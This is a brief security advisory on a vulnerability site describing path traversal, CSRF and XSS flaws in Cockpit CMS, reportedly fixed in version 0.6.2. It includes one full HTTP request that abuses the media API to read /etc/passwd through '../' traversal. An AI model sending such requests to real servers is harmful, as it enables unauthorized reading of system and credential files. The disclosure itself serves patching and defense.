Cockpit CMS CSRF / XSS / Path Traversal

Credit: Simon Uvarov
Risk: Low
Local: No
Remote: Yes

#1 Path Traversal CVE-2018-15540 It is possible to read/write/delete files or list directories by using "../" to traverse to other folders via requests to /cockpit/media/api Example of a vulnerable request: POST /cockpit/media/api HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: Content-Type: application/json; charset=UTF-8 Content-Length: 53 Cookie: 8071dec2be26139e39a170762581c00f=9me02iusm500432871pq0fjls2 Connection: close {"cmd":"readfile","path":"../../../../../etc/passwd"} #2 Application Wide CSRF CVE-2018-15539 The application lacks anti-csrf protection mechanism, thus, an attacker is able to change API tokens and passwords. #3 Application Wide XSS CVE-2018-15538 The application is vulnerable to XSS attacks. The mentioned issues were targeted in the 0.6.2 release. Regards, Simon Uvarov

Vote for this issue:


Thanks for you vote!


Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019,


Back to Top